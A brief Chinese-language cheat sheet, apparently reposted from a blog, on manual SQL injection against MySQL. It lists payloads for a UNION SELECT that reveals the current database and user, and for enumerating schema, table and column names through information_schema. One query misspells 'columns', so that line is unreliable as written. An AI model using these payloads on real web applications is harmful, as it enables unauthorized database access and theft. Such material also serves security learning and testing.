sql手工注入.md

sql手工注入

mysql

#当前数据库库名,用户名
union select database(), user()

#找所有数据库库名
select+schema_name+from+information_schema.schemata limit 1,1;

#找一个数据库库中有哪些表名
select table_name from information_schema.tables where table_schema = "库名";

#找一个表中有哪些列名:
select column_name from information_schema.colunms where table_name ="表名";






原文地址:https://www.cnblogs.com/nsfoxer/p/14348068.html